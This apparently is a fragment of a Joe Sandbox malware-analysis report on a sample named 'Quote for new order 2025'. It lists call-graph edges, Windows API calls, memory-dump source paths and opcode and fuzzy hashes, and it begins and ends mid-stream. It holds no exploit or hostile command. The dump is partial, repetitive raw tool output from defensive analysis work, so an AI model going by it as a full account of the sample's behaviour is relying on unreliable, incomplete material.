39570->39572 39570->39574 39571->39570 39573 97b43a KiUserCallbackDispatcher 39571->39573 39571->39574 39572->39574 39573->39570 39574->39549 39576 97ae28 39575->39576 39577 97af08 3 API calls 39576->39577 39578 97ae7d 39576->39578 39579 97b197 39577->39579 39578->39549 39582 97b397 39579->39582 39585 97b2ea 39579->39585 39657 97a0a4 GetFocus 39579->39657 39581 97b43f 39583 977244 3 API calls 39581->39583 39581->39585 39582->39581 39584 97b43a KiUserCallbackDispatcher 39582->39584 39582->39585 39583->39585 39584->39581 39585->39549 39587 97af2a 39586->39587 39589 97af90 39586->39589 39588 97af08 4 API calls 39587->39588 39587->39589 39590 97b197 39588->39590 39589->39549 39593 97b397 39590->39593 39596 97b2ea 39590->39596 39658 97a0a4 GetFocus 39590->39658 39592 97b43f 39594 977244 4 API calls 39592->39594 39592->39596 39593->39592 39595 97b43a KiUserCallbackDispatcher 39593->39595 39593->39596 39594->39596 39595->39592 39596->39549 39598 97af2a 39597->39598 39600 97af90 39597->39600 39599 97af08 3 API calls 39598->39599 39598->39600 39601 97b197 39599->39601 39600->39549 39604 97b397 39601->39604 39607 97b2ea 39601->39607 39659 97a0a4 GetFocus 39601->39659 39603 97b43f 39605 977244 3 API calls 39603->39605 39603->39607 39604->39603 39606 97b43a KiUserCallbackDispatcher 39604->39606 39604->39607 39605->39607 39606->39603 39607->39549 39609 97af08 4 API calls 39608->39609 39610 97b197 39608->39610 39609->39610 39613 97b397 39610->39613 39616 97b2ea 39610->39616 39660 97a0a4 GetFocus 39610->39660 39612 97b43f 39614 977244 4 API calls 39612->39614 39612->39616 39613->39612 39615 97b43a KiUserCallbackDispatcher 39613->39615 39613->39616 39614->39616 39615->39612 39616->39549 39618 97b36e 39617->39618 39621 97b397 39618->39621 39624 97b4ab 39618->39624 39661 97a0a4 GetFocus 39618->39661 39620 97b43f 39622 977244 4 API calls 39620->39622 39620->39624 39621->39620 39623 97b43a KiUserCallbackDispatcher 39621->39623 39621->39624 39622->39624 39623->39620 39627 97b36e 

Control-flow Graph (entry 6f50458)

APIs
• GetSysColorBrush.USER32(00000000), ref: 06F508E8
Memory Dump Source
• Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
Similarity
• API ID: BrushColor
• String ID:
• API String ID: 464657469-0
• Opcode ID: bcfec86c9ede9b3553a3e22c75b7d6a14323a7d276499f8dca68046456f88cc3
• Instruction ID: 99ba094604bae981ee6690793c9fd86fce4b7860ac028ad342ce0abb6aa6070e
• Opcode Fuzzy Hash: bcfec86c9ede9b3553a3e22c75b7d6a14323a7d276499f8dca68046456f88cc3
• Instruction Fuzzy Hash: 7932363590061ACFDB61DF64C944BD9B7B2BF89300F1585E9E909AB261EB70EE85CF40

Control-flow Graph (entry 6f5f7f1)

Memory Dump Source
• Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: af4e356a59ed603ba5d05656fbe561f0617803841c072f2b4cee5dadc8c3a759
• Instruction ID: 88b26a6520b24656ea0cb41eb40d83e51a053db1b9eedcebcc784d764ee0978f
• Opcode Fuzzy Hash: af4e356a59ed603ba5d05656fbe561f0617803841c072f2b4cee5dadc8c3a759
• Instruction Fuzzy Hash: 93D13A30E01209CFDB54DFA9C958BADBBF1BF84314F1681A4D905AB2A5DB70AD45CF81

Control-flow Graph (entry 977530)

APIs
• GetCurrentProcess.KERNEL32 ref: 009775BE
• GetCurrentThread.KERNEL32 ref: 009775FB
• GetCurrentProcess.KERNEL32 ref: 00977638
• GetCurrentThreadId.KERNEL32 ref: 00977691
Memory Dump Source
• Source File: 00000005.00000002.3528861980.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_970000_Quote for new order 2025.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: bd53e90abb362058778b358d3f4101a51e94aea1903eaaec08c84787f57b6c24
• Instruction ID: e0e673af6416b178cd07b124600d4d8e41728ca660756bf79e30aeb022836934
• Opcode Fuzzy Hash: bd53e90abb362058778b358d3f4101a51e94aea1903eaaec08c84787f57b6c24
• Instruction Fuzzy Hash: DB5154B1901749CFCB14CFA9D548B9EFBF1AB88314F20C4AAE019A7361DB749984CF65

Control-flow Graph (entry 977540)

APIs
• GetCurrentProcess.KERNEL32 ref: 009775BE
• GetCurrentThread.KERNEL32 ref: 009775FB
• GetCurrentProcess.KERNEL32 ref: 00977638
• GetCurrentThreadId.KERNEL32 ref: 00977691
Memory Dump Source
• Source File: 00000005.00000002.3528861980.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_970000_Quote for new order 2025.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 17a4baf7ed5dd203d733999986763e91c203dc07b979c1d2dfc971c6e2990ff3
• Instruction ID: 2c84ae4c883168da227d103b40f7dc86d3043e2ed380fd90877adcd7ca17b8cf
• Opcode Fuzzy Hash: 17a4baf7ed5dd203d733999986763e91c203dc07b979c1d2dfc971c6e2990ff3
• Instruction Fuzzy Hash: C95155B1901709CFDB14CFA9D548B9EFBF1AB88314F20C469E019A7360DB74A984CF65

Control-flow Graph (entry 97d4c8)

APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 0097D72E
Memory Dump Source
• Source File: 00000005.00000002.3528861980.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_970000_Quote for new order 2025.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 611a0aa3817b5d6e7216bc0abab7ae8f01c9c810fd813adaf7bb0a013195e190
• Instruction ID: 9aef3498a277526c26646bb34de6db65968015e48973f58eb0e85116abc3ee88
• Opcode Fuzzy Hash: 611a0aa3817b5d6e7216bc0abab7ae8f01c9c810fd813adaf7bb0a013195e190
• Instruction Fuzzy Hash: C88155B1A01B058FD724DF29D44179ABBF5BF88304F108A2DE08AD7B54D775E949CB90

Control-flow Graph (entry 97fad0)

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0097FBE2
Memory Dump Source
• Source File: 00000005.00000002.3528861980.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_970000_Quote for new order 2025.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: e2fd21e672658fad606a11ed8e08673c477ad7d4e19e2efb4d21eb2e5ef7ad10
• Instruction ID: 4150a63babb566369c45b8ddb562eceabcbddc0228da335414fd60fd10b2f47e
• Opcode Fuzzy Hash: e2fd21e672658fad606a11ed8e08673c477ad7d4e19e2efb4d21eb2e5ef7ad10
• Instruction Fuzzy Hash: 0141BDB1D00349DFDB14CFA9C894ADEBBB5FF48310F24852AE818AB210D7759885CF90

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0097780F
Memory Dump Source
• Source File: 00000005.00000002.3528861980.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_970000_Quote for new order 2025.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: ad9a5d94354103448a40e4d50b475cc232b59f3f9b1e14f0a0c2aec0703d6f88
• Instruction ID: 4a0f50bb430693128ac5abfc8142777b2ba82716d2b54a3e935f822028f4c1f3
• Opcode Fuzzy Hash: ad9a5d94354103448a40e4d50b475cc232b59f3f9b1e14f0a0c2aec0703d6f88
• Instruction Fuzzy Hash: EB3193B4A40340CFE7009F64E959BA97BB5F789701F25852AE9058B3E5DF740806CF21
                                                                                                                                                        APIs
                                                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06F500D7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DrawText
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2175133113-0
                                                                                                                                                        • Opcode ID: 3dd798a8f8457fefe485a9a70a16a792a62f33a202d6e8cd970a11bb1f661873
                                                                                                                                                        • Instruction ID: db33f0483bed4edc1be096902427550f8e23cb08b619b4265b7e6c004fe06272
                                                                                                                                                        • Opcode Fuzzy Hash: 3dd798a8f8457fefe485a9a70a16a792a62f33a202d6e8cd970a11bb1f661873
                                                                                                                                                        • Instruction Fuzzy Hash: 843104B5D012499FDB10CFAAD880ADEFFF4EF49310F14842AE919A7211C775A945CFA0
                                                                                                                                                        APIs
                                                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06F500D7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DrawText
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2175133113-0
                                                                                                                                                        • Opcode ID: bf7b65d0b37aa2d2cf9299ad12e61ef6d78dca0c176aa6082650fb29851831c1
                                                                                                                                                        • Instruction ID: d18ac1933e84c3930a74bed4a6d22af7ae32b3b9da562429dcdaac52c890a26a
                                                                                                                                                        • Opcode Fuzzy Hash: bf7b65d0b37aa2d2cf9299ad12e61ef6d78dca0c176aa6082650fb29851831c1
                                                                                                                                                        • Instruction Fuzzy Hash: 7B21BFB5D002499FDB10CF9AD884AEEFBF5FB48320F14842AE919A7310D775A944CFA4
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0097780F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528861980.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_970000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: c23c0c347f69bc114e4c0f515f97b28a6b825aef9fcf70d6ba9fe866267d294a
                                                                                                                                                        • Instruction ID: fb6c700f5097114e5c3491f26bf5334b1c1000ff5fc81385aee4e166effa0306
                                                                                                                                                        • Opcode Fuzzy Hash: c23c0c347f69bc114e4c0f515f97b28a6b825aef9fcf70d6ba9fe866267d294a
                                                                                                                                                        • Instruction Fuzzy Hash: C121E3B5D002589FDB10CFA9D984AEEFFF4EB48320F14845AE958A7350D374A944CFA1
                                                                                                                                                        APIs
                                                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 06F5F3C5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePost
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                                        • Opcode ID: 8eed9145454c6d4c952f8ccc846ed63aaafdc548c856273d9d59e05c3de377a0
                                                                                                                                                        • Instruction ID: dddd0692cbbff82aa4f7691d818fab336d6a6b81bfdfa020c2db574831c236e6
                                                                                                                                                        • Opcode Fuzzy Hash: 8eed9145454c6d4c952f8ccc846ed63aaafdc548c856273d9d59e05c3de377a0
                                                                                                                                                        • Instruction Fuzzy Hash: DF217F718053898FC711CF99C845BDEFFF4AF0A310F14849AD994A7251D334A944CFA1
                                                                                                                                                        APIs
                                                                                                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 06F5FD68
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePeek
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2222842502-0
                                                                                                                                                        • Opcode ID: baf1f4c7af1a96fc5ebe41158cb8bff13c24a328639dec4107d07f7d80df4c68
                                                                                                                                                        • Instruction ID: df35815ad98ad2f4de5f2dc61d96d8cddcb61fefe37e36b3b056d9a3bbaa1957
                                                                                                                                                        • Opcode Fuzzy Hash: baf1f4c7af1a96fc5ebe41158cb8bff13c24a328639dec4107d07f7d80df4c68
                                                                                                                                                        • Instruction Fuzzy Hash: 272149B58053499FCB11CF99C844ADEBFF8EF09310F14806AE954A7251C379A944CFA5
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0097780F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528861980.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_970000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: 639cb870ac4237a569b15622b0d574b7a1be1935ade864b1d1a09d89a01b0579
                                                                                                                                                        • Instruction ID: 19a80047c9e25e4cdc09650814547c30403647458b1c2bd84920d347f1e0f20a
                                                                                                                                                        • Opcode Fuzzy Hash: 639cb870ac4237a569b15622b0d574b7a1be1935ade864b1d1a09d89a01b0579
                                                                                                                                                        • Instruction Fuzzy Hash: A621E0B59002489FDB10CFAAD984ADEFBF8EB48320F14841AE918A3310D374A940CFA5
                                                                                                                                                        APIs
                                                                                                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 06F5FD68
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePeek
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2222842502-0
                                                                                                                                                        • Opcode ID: 0af756accebcfa79dccf60aaf57d92c5ae8c716d93728015bbe3a2f8780874b7
                                                                                                                                                        • Instruction ID: be830a84fa6910b7cd33d666d4aeb53ed0fd7fee4c3a26541e99a509a2d70b49
                                                                                                                                                        • Opcode Fuzzy Hash: 0af756accebcfa79dccf60aaf57d92c5ae8c716d93728015bbe3a2f8780874b7
                                                                                                                                                        • Instruction Fuzzy Hash: 7A11D4B5C00249DFDB10CF9AD944BDEFBF8EB48320F14846AE958A7251C379A944CFA5
                                                                                                                                                        APIs
                                                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 06F5F3C5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePost
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                                        • Opcode ID: 4d44e71d718aa9ef0e31f7bdd609558d486516ff9202134c068a018a4460a7a0
                                                                                                                                                        • Instruction ID: fbcc88360b87efd50f5c699b4ee7a34fdcacd01f8889186029aac5d29d3a5109
                                                                                                                                                        • Opcode Fuzzy Hash: 4d44e71d718aa9ef0e31f7bdd609558d486516ff9202134c068a018a4460a7a0
                                                                                                                                                        • Instruction Fuzzy Hash: 9A11F5B5800349DFDB10CF9AC845BDEFBF8EB48320F14845AE958A3650D379A984CFA5
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540516506.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f80000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: 598a3f93c29b5ee935356ed39334cef8950b2157d226b1d88f7e0f133db64498
                                                                                                                                                        • Instruction ID: 913024790544b5fe4696cd88f6ed95b7b593dd171a5272736b8b7a808a46ae10
                                                                                                                                                        • Opcode Fuzzy Hash: 598a3f93c29b5ee935356ed39334cef8950b2157d226b1d88f7e0f133db64498
                                                                                                                                                        • Instruction Fuzzy Hash: 8011F2B5C046498FCB10DF9AD844BCEFBF4AB48314F10855AE869A3250D779A544CFA5
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0097D72E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528861980.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_970000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                        • Opcode ID: a0ef3208b20dac1b6c94d647d6908819ede68c741597fc925cdbd59af2659609
                                                                                                                                                        • Instruction ID: 02209ed8aba8779aaf9c37aab8fabe5c6c69d4f08d7eb95a0e61f778bf5c3f7d
                                                                                                                                                        • Opcode Fuzzy Hash: a0ef3208b20dac1b6c94d647d6908819ede68c741597fc925cdbd59af2659609
                                                                                                                                                        • Instruction Fuzzy Hash: CE11DFB6C002498FCB14CF9AC444ADEFBF9AF88324F14C46AD469A7210C375A545CFA5
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540516506.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f80000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: 65235d63e31f805ec9a4937cf80da05cc2fb784b9d9aab76c7537e3064363ad7
                                                                                                                                                        • Instruction ID: 9965e580e9387438dd9919ff72f23f2154f9a26306d023a1978bc8c4a69604e0
                                                                                                                                                        • Opcode Fuzzy Hash: 65235d63e31f805ec9a4937cf80da05cc2fb784b9d9aab76c7537e3064363ad7
                                                                                                                                                        • Instruction Fuzzy Hash: 3A1122B1C00689CFCB14DFAAD844BCEFBF4AF48324F10856AD868A7650C374A184CFA5
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540516506.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f80000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: 2144f0d3e5bb021ec7cb021d0e9670b63c0fcfe17c5a0d55139f2e1648c67674
                                                                                                                                                        • Instruction ID: 952a4fb0eba1b0a2be3bedc9a6938320a7e2f5d2ce1a23384fe3a574d1317525
                                                                                                                                                        • Opcode Fuzzy Hash: 2144f0d3e5bb021ec7cb021d0e9670b63c0fcfe17c5a0d55139f2e1648c67674
                                                                                                                                                        • Instruction Fuzzy Hash: 2E110DB5C04248CFCB10DF9AD848BCEFBF4EB48324F10846AD868A3210C378A584CFA5
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540516506.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f80000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: cf9273b710fe7c6d90051249e190f60ec5807344241ec4c54832009b4ff8c149
                                                                                                                                                        • Instruction ID: 345cb82b58fb0a077c5a09306cb81f0dfa79ddd27bb005a3285ffa700d0be11e
                                                                                                                                                        • Opcode Fuzzy Hash: cf9273b710fe7c6d90051249e190f60ec5807344241ec4c54832009b4ff8c149
                                                                                                                                                        • Instruction Fuzzy Hash: F5110DB5C00249CFCB10DF9AD844BCEFBF4EB48324F10846AE428A3210C378A544CFA5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528369788.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_91d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 701daaa30d120e330c7511b8070aa06389c2cb56aab599a70c1713ed23620212
                                                                                                                                                        • Instruction ID: 22c13c2b49839b5ecc56d7bde8060ae8bcb46438f44b40f25dfb14b480f5db0b
                                                                                                                                                        • Opcode Fuzzy Hash: 701daaa30d120e330c7511b8070aa06389c2cb56aab599a70c1713ed23620212
                                                                                                                                                        • Instruction Fuzzy Hash: 2E213A71600208DFDB05DF14D9C0B57BF66FB98318F20C569F9094B25AC33AD896C7A1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528504362.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_92d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 51b6f7a480602b5946ad1c3a6fa3b77853afdbca52c117dac41fe2c12d668841
                                                                                                                                                        • Instruction ID: 2bddf3b86d9739dc06a6ea9b461b7957475a8066b57442d81ea045af3bf53545
                                                                                                                                                        • Opcode Fuzzy Hash: 51b6f7a480602b5946ad1c3a6fa3b77853afdbca52c117dac41fe2c12d668841
                                                                                                                                                        • Instruction Fuzzy Hash: 19213871505200EFDB05DF14E9C4B26BBA9FB84314F30CA6DE8094B39AC33AD846CBA1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528504362.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_92d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: df555bb4e833e8253f1f650bc9caac427fef9ce093c447a38eb4693294251e74
                                                                                                                                                        • Instruction ID: e67be6ec47da65fe01206f061023b07c8bc12db2b33ac71551561c1aa7ff5ca8
                                                                                                                                                        • Opcode Fuzzy Hash: df555bb4e833e8253f1f650bc9caac427fef9ce093c447a38eb4693294251e74
                                                                                                                                                        • Instruction Fuzzy Hash: 61210471684240DFDB14DF14E9C4B26BFA5FB84314F20C96DD94A4B2AAC33AD847CA61
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528504362.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_92d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 74912257832bb2fbf58b161744b63fccf4ac6b93d46a732a6577514296eac4db
                                                                                                                                                        • Instruction ID: 0d4c04cdb73a7f5b1c355003844359c77d23be55364dee2b0485cbdf5af2aedd
                                                                                                                                                        • Opcode Fuzzy Hash: 74912257832bb2fbf58b161744b63fccf4ac6b93d46a732a6577514296eac4db
                                                                                                                                                        • Instruction Fuzzy Hash: 21213B71505200DFDB00DF14E9C4F26BB69FB84318F30C569E8094B25DC37AE845C7A1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528504362.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_92d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9672a5afce040b35f4244c658a6d3fc4402d71e02f6f9c672e45ee93a7dcf479
                                                                                                                                                        • Instruction ID: d16729cdf1f52a1c3a474c8413235bbd45d8c17effeae5fcb0149f71d8cdd299
                                                                                                                                                        • Opcode Fuzzy Hash: 9672a5afce040b35f4244c658a6d3fc4402d71e02f6f9c672e45ee93a7dcf479
                                                                                                                                                        • Instruction Fuzzy Hash: 88213AB1505240DFDB04DF14E6C4B2AFBA9FBD4718F34C66DD8494B259C339D80AC6A2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528504362.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_92d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 47106e2d41ded9f6a2745f2ce540a3f5759bb339527f9d697c531e3a89be47cb
                                                                                                                                                        • Instruction ID: 8eee50aea14903699d97710137ab6406f1c687cf2df050c965c8924062d8fd12
                                                                                                                                                        • Opcode Fuzzy Hash: 47106e2d41ded9f6a2745f2ce540a3f5759bb339527f9d697c531e3a89be47cb
                                                                                                                                                        • Instruction Fuzzy Hash: 23218E755493808FCB12CF24D994715BF71EB46314F28C5EAD8498F6A7C33A980ACB62
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528369788.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_91d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                        • Instruction ID: 2a617ad610c04defbaa9873cd5515bca363082bf5157ae379c4a8bdfe7babe0c
                                                                                                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                        • Instruction Fuzzy Hash: B311E676504244CFDB16CF14D5C4B56BF72FB94318F24C6A9ED090B25AC33AD85ACBA1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528504362.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
